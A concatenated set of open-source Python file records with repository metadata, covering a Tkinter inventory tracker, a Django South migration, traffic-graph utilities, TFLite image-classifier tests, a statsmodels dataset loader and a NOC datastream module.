)) con.commit() self.view_data() con.close() except: pass else: self.clear() #------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------- def export_data(self): """Function to Expoet data into various Formats""" que1 = messagebox.askquestion( "Export", "Do you want to export to CSV?", icon ='info') if que1 == 'yes': toCSV() que2 = messagebox.askquestion( "Export", "Do you want to export to PDF?", icon ='info') if que2 == 'yes': CsvtoPDF() #------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------- def view_data(self): """Function to VIEW data into Table""" self.search_txt_var.set("") con=sqlite3.connect('inventory.db') cur=con.cursor() cur.execute("select * from dmce_inventory") rows=cur.fetchall() self.View_Table.delete(*self.View_Table.get_children()) if len(rows)!=0: for row in rows: self.View_Table.insert("", END, values=row) con.commit() con.close() #------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------- def clear(self): """Function to CLEAR all Input Fields""" self.product_id_var.set("") self.product_type_var.set("") self.model_no_var.set("") self.manufacturer_var.set("") self.location_var.set("") self.incharge_var.set("") self.txt_comment.delete("1.0", END) #------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------- def get_cursor(self,event): """Function to SELECT a particular item""" try: cursor_row=self.View_Table.focus() contents=self.View_Table.item(cursor_row) row=contents["values"] self.product_id_var.set(row[0]) self.product_type_var.set(row[1]) self.model_no_var.set(row[2]) self.manufacturer_var.set(row[3]) self.department_var.set(row[4]) self.location_var.set(row[5]) self.incharge_var.set(row[6]) self.txt_comment.delete("1.0", END) self.txt_comment.insert(END, row[7]) except: pass #------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------- def update_data(self): """Function to UPDATE an item of Database""" con=sqlite3.connect('inventory.db') cur=con.cursor() cur.execute("update dmce_inventory set product_type=? , model_no=? , manufacturer=? , department=? , location=? ,incharge=?, comment=? where product_id=?",( self.product_type_var.get(), self.model_no_var.get(), self.manufacturer_var.get(), self.department_var.get(), self.location_var.get(), self.incharge_var.get(), self.txt_comment.get('1.0',END), self.product_id_var.get() )) con.commit() self.view_data() self.clear() con.close() #------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------- def delete_data(self): """Function to DELETE an item from the Database""" con=sqlite3.connect('inventory.db') cur=con.cursor() cur.execute("delete from dmce_inventory where product_id=?",(self.product_id_var.get(),)) con.commit() self.view_data() self.clear() con.close() #------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------- def search_data(self): """Function to Search for items in Database""" con=sqlite3.connect('inventory.db') cur=con.cursor() if self.search_by_var.get()=="Product ID.": cur.execute("select * from dmce_inventory where product_id=?", ( self.search_txt_var.get(),)) rows=cur.fetchall() elif self.search_by_var.get()=="Product Type": cur.execute("select * from dmce_inventory where product_type=?", ( self.search_txt_var.get(),)) rows=cur.fetchall() elif self.search_by_var.get()=="Model No": cur.execute("select * from dmce_inventory where model_no=?", ( self.search_txt_var.get(),)) rows=cur.fetchall() elif self.search_by_var.get()=="Manufacturer": cur.execute("select * from dmce_inventory where manufacturer=?", ( self.search_txt_var.get(),)) rows=cur.fetchall() elif self.search_by_var.get()=="Department": cur.execute("select * from dmce_inventory where department=?", ( self.search_txt_var.get(),)) rows=cur.fetchall() elif self.search_by_var.get()=="Location": cur.execute("select * from dmce_inventory where location=?", ( self.search_txt_var.get(),)) rows=cur.fetchall() elif self.search_by_var.get()=="Incharge": cur.execute("select * from dmce_inventory where incharge=?", ( self.search_txt_var.get(),)) rows=cur.fetchall() else: cur.execute("select * from dmce_inventory where product_id=? OR product_type=? OR model_no=? OR manufacturer=? OR department=? OR location=? OR incharge=?", ( self.search_txt_var.get(), self.search_txt_var.get(), self.search_txt_var.get(), self.search_txt_var.get(), self.search_txt_var.get(), self.search_txt_var.get(), self.search_txt_var.get(), )) rows=cur.fetchall() self.View_Table.delete(*self.View_Table.get_children()) if len(rows)!=0: for row in rows: self.View_Table.insert("", END, values=row) con.commit() con.close() #------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------- if __name__ == '__main__': """START THE PROGRAM""" create_database() root = Tk() root.title("Inventory Tracking System") root.iconbitmap("its_icon.ico") ob = Inventory(root) root.mainloop()
56.598291
218
0.39516
bd76b6b6ee215e096b2b0924ab60e7d5ae5c5080
6,057
py
Python
djangocms_events/south_migrations/0010_auto__add_field_event_target_page.py
kohout/djangocms-getaweb-events
e02f635748c919ba4092790d5c14d05645cd8bc9
[ "Unlicense" ]
null
null
null
djangocms_events/south_migrations/0010_auto__add_field_event_target_page.py
kohout/djangocms-getaweb-events
e02f635748c919ba4092790d5c14d05645cd8bc9
[ "Unlicense" ]
null
null
null
djangocms_events/south_migrations/0010_auto__add_field_event_target_page.py
kohout/djangocms-getaweb-events
e02f635748c919ba4092790d5c14d05645cd8bc9
[ "Unlicense" ]
null
null
null
# -*- coding: utf-8 -*- from south.utils import datetime_utils as datetime from south.db import db from south.v2 import SchemaMigration from django.db import models class Migration(SchemaMigration): def forwards(self, orm): # Adding field 'Event.target_page' db.add_column(u'djangocms_events_event', 'target_page', self.gf('django.db.models.fields.related.ForeignKey')(to=orm['sites.Site'], null=True, blank=True), keep_default=False) # Removing M2M table for field target_page on 'Event' db.delete_table(db.shorten_name(u'djangocms_events_event_target_page')) def backwards(self, orm): # Deleting field 'Event.target_page' db.delete_column(u'djangocms_events_event', 'target_page_id') # Adding M2M table for field target_page on 'Event' m2m_table_name = db.shorten_name(u'djangocms_events_event_target_page') db.create_table(m2m_table_name, ( ('id', models.AutoField(verbose_name='ID', primary_key=True, auto_created=True)), ('event', models.ForeignKey(orm[u'djangocms_events.event'], null=False)), ('site', models.ForeignKey(orm[u'sites.site'], null=False)) )) db.create_unique(m2m_table_name, ['event_id', 'site_id']) models = { 'cms.cmsplugin': { 'Meta': {'object_name': 'CMSPlugin'}, 'changed_date': ('django.db.models.fields.DateTimeField', [], {'auto_now': 'True', 'blank': 'True'}), 'creation_date': ('django.db.models.fields.DateTimeField', [], {'default': 'datetime.datetime.now'}), u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}), 'language': ('django.db.models.fields.CharField', [], {'max_length': '15', 'db_index': 'True'}), 'level': ('django.db.models.fields.PositiveIntegerField', [], {'db_index': 'True'}), 'lft': ('django.db.models.fields.PositiveIntegerField', [], {'db_index': 'True'}), 'parent': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['cms.CMSPlugin']", 'null': 'True', 'blank': 'True'}), 'placeholder': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['cms.Placeholder']", 'null': 'True'}), 'plugin_type': ('django.db.models.fields.CharField', [], {'max_length': '50', 'db_index': 'True'}), 'position': ('django.db.models.fields.PositiveSmallIntegerField', [], {'null': 'True', 'blank': 'True'}), 'rght': ('django.db.models.fields.PositiveIntegerField', [], {'db_index': 'True'}), 'tree_id': ('django.db.models.fields.PositiveIntegerField', [], {'db_index': 'True'}) }, 'cms.placeholder': { 'Meta': {'object_name': 'Placeholder'}, 'default_width': ('django.db.models.fields.PositiveSmallIntegerField', [], {'null': 'True'}), u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}), 'slot': ('django.db.models.fields.CharField', [], {'max_length': '50', 'db_index': 'True'}) }, u'djangocms_events.event': { 'Meta': {'ordering': "['start_date', 'start_time', 'end_date', 'end_time']", 'object_name': 'Event'}, 'description': ('tinymce.models.HTMLField', [], {'null': 'True', 'blank': 'True'}), 'end_date': ('django.db.models.fields.DateField', [], {'null': 'True', 'blank': 'True'}), 'end_time': ('django.db.models.fields.TimeField', [], {'null': 'True', 'blank': 'True'}), u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}), 'image': ('django.db.models.fields.files.ImageField', [], {'max_length': '100', 'null': 'True', 'blank': 'True'}), 'name': ('django.db.models.fields.CharField', [], {'max_length': '255'}), 'start_date': ('django.db.models.fields.DateField', [], {'null': 'True', 'blank': 'True'}), 'start_time': ('django.db.models.fields.TimeField', [], {'null': 'True', 'blank': 'True'}), 'tags': ('django.db.models.fields.related.ManyToManyField', [], {'symmetrical': 'False', 'to': u"orm['djangocms_events.Tag']", 'null': 'True', 'blank': 'True'}), 'target_page': ('django.db.models.fields.related.ForeignKey', [], {'to': u"orm['sites.Site']", 'null': 'True', 'blank': 'True'}) }, u'djangocms_events.eventslist': { 'Meta': {'object_name': 'EventsList', '_ormbases': ['cms.CMSPlugin']}, 'archive': ('django.db.models.fields.CharField', [], {'default': "('all', u'All Events')", 'max_length': '50'}), 'category': ('django.db.models.fields.related.ManyToManyField', [], {'symmetrical': 'False', 'to': u"orm['djangocms_events.Tag']", 'null': 'True', 'blank': 'True'}), u'cmsplugin_ptr': ('django.db.models.fields.related.OneToOneField', [], {'to': "orm['cms.CMSPlugin']", 'unique': 'True', 'primary_key': 'True'}), 'max_item_count': ('django.db.models.fields.PositiveIntegerField', [], {'default': '0'}), 'target_page': ('django.db.models.fields.related.ForeignKey', [], {'to': u"orm['sites.Site']", 'null': 'True', 'blank': 'True'}), 'title': ('django.db.models.fields.CharField', [], {'max_length': '255', 'null': 'True', 'blank': 'True'}) }, u'djangocms_events.tag': { 'Meta': {'object_name': 'Tag'}, u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}), 'name': ('django.db.models.fields.CharField', [], {'max_length': '255'}) }, u'sites.site': { 'Meta': {'ordering': "(u'domain',)", 'object_name': 'Site', 'db_table': "u'django_site'"}, 'domain': ('django.db.models.fields.CharField', [], {'max_length': '100'}), u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}), 'name': ('django.db.models.fields.CharField', [], {'max_length': '50'}) } } complete_apps = ['djangocms_events']
66.56044
177
0.579165
6d483295229e88d0b0fe472751c0f43066742443
4,260
py
Python
lib/utils.py
tijsmaas/TrafficPrediction
9129faea8fee8c2d90595d2974f0b11030ad2674
[ "MIT" ]
17
2020-08-16T04:17:57.000Z
2022-02-28T01:13:49.000Z
lib/utils.py
tijsmaas/TrafficPrediction
9129faea8fee8c2d90595d2974f0b11030ad2674
[ "MIT" ]
null
null
null
lib/utils.py
tijsmaas/TrafficPrediction
9129faea8fee8c2d90595d2974f0b11030ad2674
[ "MIT" ]
5
2020-05-23T07:47:15.000Z
2021-11-16T15:05:05.000Z
import scipy.sparse as sp from lib.dataloaders.dataloader import * from scipy.sparse import linalg import numpy as np import pickle def sym_adj(adj): """Symmetrically normalize adjacency matrix.""" adj = sp.coo_matrix(adj) rowsum = np.array(adj.sum(1)) d_inv_sqrt = np.power(rowsum, -0.5).flatten() d_inv_sqrt[np.isinf(d_inv_sqrt)] = 0. d_mat_inv_sqrt = sp.diags(d_inv_sqrt) return adj.dot(d_mat_inv_sqrt).transpose().dot(d_mat_inv_sqrt).astype(np.float32).todense() def asym_adj(adj): adj = sp.coo_matrix(adj) rowsum = np.array(adj.sum(1)).flatten() d_inv = np.power(rowsum, -1).flatten() d_inv[np.isinf(d_inv)] = 0. d_mat= sp.diags(d_inv) return d_mat.dot(adj).astype(np.float32).todense() def calculate_normalized_laplacian(adj): """ # L = D^-1/2 (D-A) D^-1/2 = I - D^-1/2 A D^-1/2 # D = diag(A 1) :param adj: :return: """ adj = sp.coo_matrix(adj) d = np.array(adj.sum(1)) d_inv_sqrt = np.power(d, -0.5).flatten() d_inv_sqrt[np.isinf(d_inv_sqrt)] = 0. d_mat_inv_sqrt = sp.diags(d_inv_sqrt) normalized_laplacian = sp.eye(adj.shape[0]) - adj.dot(d_mat_inv_sqrt).transpose().dot(d_mat_inv_sqrt).tocoo() return normalized_laplacian def calculate_random_walk_matrix(adj_mx): adj_mx = sp.coo_matrix(adj_mx) d = np.array(adj_mx.sum(1)) d_inv = np.power(d, -1).flatten() d_inv[np.isinf(d_inv)] = 0. d_mat_inv = sp.diags(d_inv) random_walk_mx = d_mat_inv.dot(adj_mx).tocoo() return random_walk_mx def calculate_reverse_random_walk_matrix(adj_mx): return calculate_random_walk_matrix(np.transpose(adj_mx)) def calculate_scaled_laplacian(adj_mx, lambda_max=2, undirected=True): if undirected: adj_mx = np.maximum.reduce([adj_mx, adj_mx.T]) L = calculate_normalized_laplacian(adj_mx) if lambda_max is None: lambda_max, _ = linalg.eigsh(L, 1, which='LM') lambda_max = lambda_max[0] L = sp.csr_matrix(L) M, _ = L.shape I = sp.identity(M, format='csr', dtype=L.dtype) L = (2 / lambda_max * L) - I return L.astype(np.float32) def get_total_trainable_parameter_size(): """ Calculates the total number of trainable parameters in the current graph. :return: """ total_parameters = 0 import tensorflow as tf for variable in tf.trainable_variables(): # shape is an array of tf.Dimension total_parameters += np.product([x.value for x in variable.get_shape()]) return total_parameters def load_pickle(pickle_file): try: with open(pickle_file, 'rb') as f: pickle_data = pickle.load(f) except UnicodeDecodeError as e: with open(pickle_file, 'rb') as f: pickle_data = pickle.load(f, encoding='latin1') except Exception as e: print('Unable to load data ', pickle_file, ':', e) raise return pickle_data def load_adj(pkl_filename, adjtype): sensor_ids, sensor_id_to_ind, adj_mx = load_pickle(pkl_filename) if adjtype == "scalap": adj = [calculate_scaled_laplacian(adj_mx)] elif adjtype == "normlap": adj = [calculate_normalized_laplacian(adj_mx).astype(np.float32).todense()] elif adjtype == "symnadj": adj = [sym_adj(adj_mx)] elif adjtype == "transition": adj = [asym_adj(adj_mx)] elif adjtype == "doubletransition": adj = [asym_adj(adj_mx), asym_adj(np.transpose(adj_mx))] elif adjtype == "random_walk": adj = [np.transpose(calculate_random_walk_matrix(adj_mx))] elif adjtype == "dual_random_walk": adj = [np.transpose(calculate_random_walk_matrix(adj_mx)), np.transpose(calculate_random_walk_matrix(np.transpose(adj_mx)))] elif adjtype == "identity": adj = [np.diag(np.ones(adj_mx.shape[0])).astype(np.float32)] else: error = 0 assert error, "adj type not defined" return sensor_ids, sensor_id_to_ind, adj def load_dataset(dataset_file, batch_size, val_batch_size=None, test_batch_size=None, **kwargs): ds = Dataset(dataset_file) ds.load_category('train', batch_size) ds.data['train_loader'].shuffle() ds.load_category('val', val_batch_size) ds.load_category('test', test_batch_size) return ds
34.634146
113
0.669718
5e0ffb9e4479ab798e2c84cde42a609743d1a419
26
py
Python
python/testData/psi/DictMissingValue.py
jnthn/intellij-community
8fa7c8a3ace62400c838e0d5926a7be106aa8557
[ "Apache-2.0" ]
2
2019-04-28T07:48:50.000Z
2020-12-11T14:18:08.000Z
python/testData/psi/DictMissingValue.py
Cyril-lamirand/intellij-community
60ab6c61b82fc761dd68363eca7d9d69663cfa39
[ "Apache-2.0" ]
173
2018-07-05T13:59:39.000Z
2018-08-09T01:12:03.000Z
python/testData/psi/DictMissingValue.py
Cyril-lamirand/intellij-community
60ab6c61b82fc761dd68363eca7d9d69663cfa39
[ "Apache-2.0" ]
2
2020-03-15T08:57:37.000Z
2020-04-07T04:48:14.000Z
dl = {key1: value1, key2:}
26
26
0.615385
30ef5b615a6040925aa0ff2239d3c905067bf712
1,034
py
Python
rapidez/main/forms.py
asisbagga-dev/RapidezWriter
e1453e69978b6def402ea64805415e6758ee4459
[ "MIT" ]
null
null
null
rapidez/main/forms.py
asisbagga-dev/RapidezWriter
e1453e69978b6def402ea64805415e6758ee4459
[ "MIT" ]
11
2021-04-06T18:30:11.000Z
2022-03-12T00:53:28.000Z
rapidez/main/forms.py
asisbagga-dev/RapidezWriter
e1453e69978b6def402ea64805415e6758ee4459
[ "MIT" ]
null
null
null
from django import forms from .models import Database, Category, Testimonials from django.contrib.auth.forms import UserCreationForm from django.contrib.auth.models import User class Databaseform(forms.ModelForm): class Meta: model = Database fields = ('heading', 'description', 'banner', 'category') class Categoryform(forms.ModelForm): class Meta: model = Category fields = '__all__' class Testimonialform(forms.ModelForm): class Meta: model = Testimonials fields = '__all__' class SignUpForm(UserCreationForm): first_name = forms.CharField(max_length=30, required=False, help_text='Optional.') last_name = forms.CharField(max_length=30, required=False, help_text='Optional.') email = forms.EmailField(max_length=254, help_text='Required. Inform a valid email address.') class Meta: model = User fields = ('username', 'first_name', 'last_name', 'email', 'password1', 'password2', )
33.354839
97
0.667311
e2d8eccfa0868ce494e9b037529d59c28989f8cf
10,690
py
Python
tensorflow_lite_support/python/test/task/vision/image_classifier_test.py
ccen-stripe/tflite-support
a92abc7eb8bd08c1fb8b26fecf394e0f8fcf3654
[ "Apache-2.0" ]
null
null
null
tensorflow_lite_support/python/test/task/vision/image_classifier_test.py
ccen-stripe/tflite-support
a92abc7eb8bd08c1fb8b26fecf394e0f8fcf3654
[ "Apache-2.0" ]
null
null
null
tensorflow_lite_support/python/test/task/vision/image_classifier_test.py
ccen-stripe/tflite-support
a92abc7eb8bd08c1fb8b26fecf394e0f8fcf3654
[ "Apache-2.0" ]
null
null
null
# Copyright 2022 The TensorFlow Authors. All Rights Reserved. # # Licensed under the Apache License, Version 2.0 (the "License"); # you may not use this file except in compliance with the License. # You may obtain a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, software # distributed under the License is distributed on an "AS IS" BASIS, # WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. # See the License for the specific language governing permissions and # limitations under the License. """Tests for image_classifier.""" import enum from absl.testing import parameterized import tensorflow as tf from tensorflow_lite_support.python.task.core import base_options as base_options_module from tensorflow_lite_support.python.task.processor.proto import bounding_box_pb2 from tensorflow_lite_support.python.task.processor.proto import class_pb2 from tensorflow_lite_support.python.task.processor.proto import classification_options_pb2 from tensorflow_lite_support.python.task.processor.proto import classifications_pb2 from tensorflow_lite_support.python.task.vision import image_classifier from tensorflow_lite_support.python.task.vision.core import tensor_image from tensorflow_lite_support.python.test import test_util _BaseOptions = base_options_module.BaseOptions _Category = class_pb2.Category _Classifications = classifications_pb2.Classifications _ClassificationResult = classifications_pb2.ClassificationResult _ImageClassifier = image_classifier.ImageClassifier _ImageClassifierOptions = image_classifier.ImageClassifierOptions _MODEL_FILE = 'mobilenet_v2_1.0_224.tflite' _IMAGE_FILE = 'burger.jpg' _EXPECTED_CLASSIFICATION_RESULT = _ClassificationResult(classifications=[ _Classifications( categories=[ _Category( index=934, score=0.739974, display_name='', category_name='cheeseburger'), _Category( index=925, score=0.026929, display_name='', category_name='guacamole'), _Category( index=932, score=0.025737, display_name='', category_name='bagel') ], head_index=0, head_name='') ]) _ALLOW_LIST = ['cheeseburger', 'guacamole'] _DENY_LIST = ['cheeseburger'] _SCORE_THRESHOLD = 0.5 _MAX_RESULTS = 3 def _create_classifier_from_options(base_options, **classification_options): classification_options = classification_options_pb2.ClassificationOptions( **classification_options) options = _ImageClassifierOptions( base_options=base_options, classification_options=classification_options) classifier = _ImageClassifier.create_from_options(options) return classifier class ModelFileType(enum.Enum): FILE_CONTENT = 1 FILE_NAME = 2 class ImageClassifierTest(parameterized.TestCase, tf.test.TestCase): def setUp(self): super().setUp() self.test_image_path = test_util.get_test_data_path(_IMAGE_FILE) self.model_path = test_util.get_test_data_path(_MODEL_FILE) def test_create_from_file_succeeds_with_valid_model_path(self): # Creates with default option and valid model file successfully. classifier = _ImageClassifier.create_from_file(self.model_path) self.assertIsInstance(classifier, _ImageClassifier) def test_create_from_options_succeeds_with_valid_model_path(self): # Creates with options containing model file successfully. base_options = _BaseOptions(file_name=self.model_path) options = _ImageClassifierOptions(base_options=base_options) classifier = _ImageClassifier.create_from_options(options) self.assertIsInstance(classifier, _ImageClassifier) def test_create_from_options_fails_with_invalid_model_path(self): # Invalid empty model path. with self.assertRaisesRegex( ValueError, r"ExternalFile must specify at least one of 'file_content', " r"'file_name' or 'file_descriptor_meta'."): base_options = _BaseOptions(file_name='') options = _ImageClassifierOptions(base_options=base_options) _ImageClassifier.create_from_options(options) def test_create_from_options_succeeds_with_valid_model_content(self): # Creates with options containing model content successfully. with open(self.model_path, 'rb') as f: base_options = _BaseOptions(file_content=f.read()) options = _ImageClassifierOptions(base_options=base_options) classifier = _ImageClassifier.create_from_options(options) self.assertIsInstance(classifier, _ImageClassifier) @parameterized.parameters( (ModelFileType.FILE_NAME, 3, _EXPECTED_CLASSIFICATION_RESULT), (ModelFileType.FILE_CONTENT, 3, _EXPECTED_CLASSIFICATION_RESULT)) def test_classify_model(self, model_file_type, max_results, expected_classification_result): # Creates classifier. if model_file_type is ModelFileType.FILE_NAME: base_options = _BaseOptions(file_name=self.model_path) elif model_file_type is ModelFileType.FILE_CONTENT: with open(self.model_path, 'rb') as f: model_content = f.read() base_options = _BaseOptions(file_content=model_content) else: # Should never happen raise ValueError('model_file_type is invalid.') classifier = _create_classifier_from_options( base_options, max_results=max_results) # Loads image. image = tensor_image.TensorImage.create_from_file(self.test_image_path) # Classifies the input. image_result = classifier.classify(image, bounding_box=None) # Comparing results (classification w/o bounding box). self.assertProtoEquals(image_result.to_pb2(), expected_classification_result.to_pb2()) def test_classify_model_with_bounding_box(self): # Creates classifier. base_options = _BaseOptions(file_name=self.model_path) classifier = _create_classifier_from_options(base_options, max_results=3) # Loads image. image = tensor_image.TensorImage.create_from_file(self.test_image_path) # Bounding box in "burger.jpg" corresponding to "burger_crop.jpg". bounding_box = bounding_box_pb2.BoundingBox( origin_x=0, origin_y=0, width=400, height=325) # Classifies the input. image_result = classifier.classify(image, bounding_box) # Expected results. expected_classification_result = _ClassificationResult(classifications=[ _Classifications( categories=[ _Category( index=934, score=0.881507, display_name='', category_name='cheeseburger'), _Category( index=925, score=0.019457, display_name='', category_name='guacamole'), _Category( index=932, score=0.012489, display_name='', category_name='bagel') ], head_index=0, head_name='') ]) # Comparing results (classification w/ bounding box). self.assertProtoEquals(image_result.to_pb2(), expected_classification_result.to_pb2()) def test_max_results_option(self): # Creates classifier. base_options = _BaseOptions(file_name=self.model_path) classifier = _create_classifier_from_options( base_options, max_results=_MAX_RESULTS) # Loads image. image = tensor_image.TensorImage.create_from_file(self.test_image_path) # Classifies the input. image_result = classifier.classify(image, bounding_box=None) categories = image_result.classifications[0].categories self.assertLessEqual( len(categories), _MAX_RESULTS, 'Too many results returned.') def test_score_threshold_option(self): # Creates classifier. base_options = _BaseOptions(file_name=self.model_path) classifier = _create_classifier_from_options( base_options, score_threshold=_SCORE_THRESHOLD) # Loads image. image = tensor_image.TensorImage.create_from_file(self.test_image_path) # Classifies the input. image_result = classifier.classify(image, bounding_box=None) categories = image_result.classifications[0].categories for category in categories: self.assertGreaterEqual( category.score, _SCORE_THRESHOLD, f'Classification with score lower than threshold found. {category}') def test_allowlist_option(self): # Creates classifier. base_options = _BaseOptions(file_name=self.model_path) classifier = _create_classifier_from_options( base_options, category_name_allowlist=_ALLOW_LIST) # Loads image. image = tensor_image.TensorImage.create_from_file(self.test_image_path) # Classifies the input. image_result = classifier.classify(image, bounding_box=None) categories = image_result.classifications[0].categories for category in categories: label = category.category_name self.assertIn(label, _ALLOW_LIST, f'Label {label} found but not in label allow list') def test_denylist_option(self): # Creates classifier. base_options = _BaseOptions(file_name=self.model_path) classifier = _create_classifier_from_options( base_options, score_threshold=0.01, category_name_denylist=_DENY_LIST) # Loads image image = tensor_image.TensorImage.create_from_file(self.test_image_path) # Classifies the input. image_result = classifier.classify(image, bounding_box=None) categories = image_result.classifications[0].categories for category in categories: label = category.category_name self.assertNotIn(label, _DENY_LIST, f'Label {label} found but in deny list.') def test_combined_allowlist_and_denylist(self): # Fails with combined allowlist and denylist with self.assertRaisesRegex( ValueError, r'`class_name_whitelist` and `class_name_blacklist` are mutually ' r'exclusive options.'): base_options = _BaseOptions(file_name=self.model_path) classification_options = classification_options_pb2.ClassificationOptions( category_name_allowlist=['foo'], category_name_denylist=['bar']) options = _ImageClassifierOptions( base_options=base_options, classification_options=classification_options) _ImageClassifier.create_from_options(options) if __name__ == '__main__': tf.test.main()
37.907801
90
0.724228
9197cb6e3a218c9c6f7dc65d7d2de551ba0668fd
103
py
Python
python3/func.py
eiadshahtout/Python
b2406b0806bc55a9d8f5482a304a8d6968249018
[ "MIT" ]
null
null
null
python3/func.py
eiadshahtout/Python
b2406b0806bc55a9d8f5482a304a8d6968249018
[ "MIT" ]
null
null
null
python3/func.py
eiadshahtout/Python
b2406b0806bc55a9d8f5482a304a8d6968249018
[ "MIT" ]
null
null
null
def spam(): eggs = 99 bacon() print(eggs) def bacon(): ham = 101 eggs = 0 spam()
10.3
15
0.485437
79b3da64c89f9152072afde814c1596079a73445
2,366
py
Python
core/datastream/change.py
xUndero/noc
9fb34627721149fcf7064860bd63887e38849131
[ "BSD-3-Clause" ]
1
2019-09-20T09:36:48.000Z
2019-09-20T09:36:48.000Z
core/datastream/change.py
ewwwcha/noc
aba08dc328296bb0e8e181c2ac9a766e1ec2a0bb
[ "BSD-3-Clause" ]
null
null
null
core/datastream/change.py
ewwwcha/noc
aba08dc328296bb0e8e181c2ac9a766e1ec2a0bb
[ "BSD-3-Clause" ]
null
null
null
# -*- coding: utf-8 -*- # ---------------------------------------------------------------------- # DataStream change notification # ---------------------------------------------------------------------- # Copyright (C) 2007-2018 The NOC Project # See LICENSE for details # ---------------------------------------------------------------------- # Python modules import logging import threading import contextlib # NOC modules from noc.core.defer import call_later from noc.core.datastream.loader import loader tls = threading.local() logger = logging.getLogger(__name__) def register_changes(data): """ Register single change :param data: List of (datasource name, object id) :return: """ if hasattr(tls, "_datastream_changes"): # Within bulk_datastream_changes context tls._datastream_changes.update(data) else: apply_changes(data) @contextlib.contextmanager def bulk_datastream_changes(): """ Buffer and deduplicate pending datastream changes Usage: with bulk_datastream_changes: .... :return: """ # Save previous state last_changes = getattr(tls, "_datastream_changes", None) # Create new context tls._datastream_changes = set() # Perform decorated computations yield # Apply changes apply_changes(list(tls._datastream_changes)) # Restore previous context if last_changes is not None: tls._datastream_changes = last_changes else: del tls._datastream_changes def apply_changes(changes): """ :param changes: List of (datastream name, object id) :return: """ if changes: call_later("noc.core.datastream.change.do_changes", changes=changes) def update_object(ds_name, object_id): """ Really apply DataStream updates :param ds_name: :param object_id: :return: """ ds = loader[ds_name] if not ds: return r = ds.update_object(object_id) if r: logger.info("[%s|%s] Object has been changed", ds_name, object_id) else: logger.info("[%s|%s] Object hasn't been changed", ds_name, object_id) def do_changes(changes): """ Change calculation worker :param changes: List of datastream name, object id :return: """ for ds_name, object_id in sorted(changes): update_object(ds_name, object_id)
24.645833
77
0.610313
a759be85790b9d4d4dbe38e7c7e37eed3c3ad62a
2,525
py
Python
statsmodels/datasets/committee/data.py
escheffel/statsmodels
bc70147c4c7ea00b6ac7256bbaf107902983c189
[ "BSD-3-Clause" ]
2
2017-01-05T22:44:37.000Z
2018-04-26T08:34:00.000Z
statsmodels/datasets/committee/data.py
changhiskhan/statsmodels
af26395e8b75b112ae7b3099532aefd8d002b8ca
[ "BSD-3-Clause" ]
null
null
null
statsmodels/datasets/committee/data.py
changhiskhan/statsmodels
af26395e8b75b112ae7b3099532aefd8d002b8ca
[ "BSD-3-Clause" ]
null
null
null
"""First 100 days of the US House of Representatives 1995""" __docformat__ = 'restructuredtext' COPYRIGHT = """Used with express permission from the original author, who retains all rights.""" TITLE = __doc__ SOURCE = """ Jeff Gill's `Generalized Linear Models: A Unifited Approach` http://jgill.wustl.edu/research/books.html """ DESCRSHORT = """Number of bill assignments in the 104th House in 1995""" DESCRLONG = """The example in Gill, seeks to explain the number of bill assignments in the first 100 days of the US' 104th House of Representatives. The response variable is the number of bill assignments in the first 100 days over 20 Committees. The explanatory variables in the example are the number of assignments in the first 100 days of the 103rd House, the number of members on the committee, the number of subcommittees, the log of the number of staff assigned to the committee, a dummy variable indicating whether the committee is a high prestige committee, and an interaction term between the number of subcommittees and the log of the staff size. The data returned by load are not cleaned to represent the above example. """ NOTE = """Number of Observations - 20 Number of Variables - 6 Variable name definitions:: BILLS104 - Number of bill assignments in the first 100 days of the 104th House of Representatives. SIZE - Number of members on the committee. SUBS - Number of subcommittees. STAFF - Number of staff members assigned to the committee. PRESTIGE - PRESTIGE == 1 is a high prestige committee. BILLS103 - Number of bill assignments in the first 100 days of the 103rd House of Representatives. Committee names are included as a variable in the data file though not returned by load. """ from numpy import recfromtxt, column_stack, array import statsmodels.tools.datautils as du from os.path import dirname, abspath def load(): """Load the committee data and returns a data class. Returns -------- Dataset instance: See DATASET_PROPOSAL.txt for more information. """ data = _get_data() return du.process_recarray(data, endog_idx=0, dtype=float) def load_pandas(): data = _get_data() return du.process_recarray_pandas(data, endog_idx=0, dtype=float) def _get_data(): filepath = dirname(abspath(__file__)) data = recfromtxt(open(filepath + '/committee.csv', 'rb'), delimiter=",", names=True, dtype=float, usecols=(1,2,3,4,5,6)) return data
35.069444
79
0.725149
ede6f55df27cbc102012eb8d7a7312413cdb6ded
13,895
py
Python
pipelines.py
flash-ai-fydp/question_generation
fba1e2292e26207b99db8dc783536b9bf51d786e
[ "MIT" ]
null
null
null
pipelines.py
flash-ai-fydp/question_generation
fba1e2292e26207b99db8dc783536b9bf51d786e
[ "MIT" ]
null
null
null
pipelines.py
flash-ai-fydp/question_generation
fba1e2292e26207b99db8dc783536b9bf51d786e
[ "MIT" ]
null
null
null
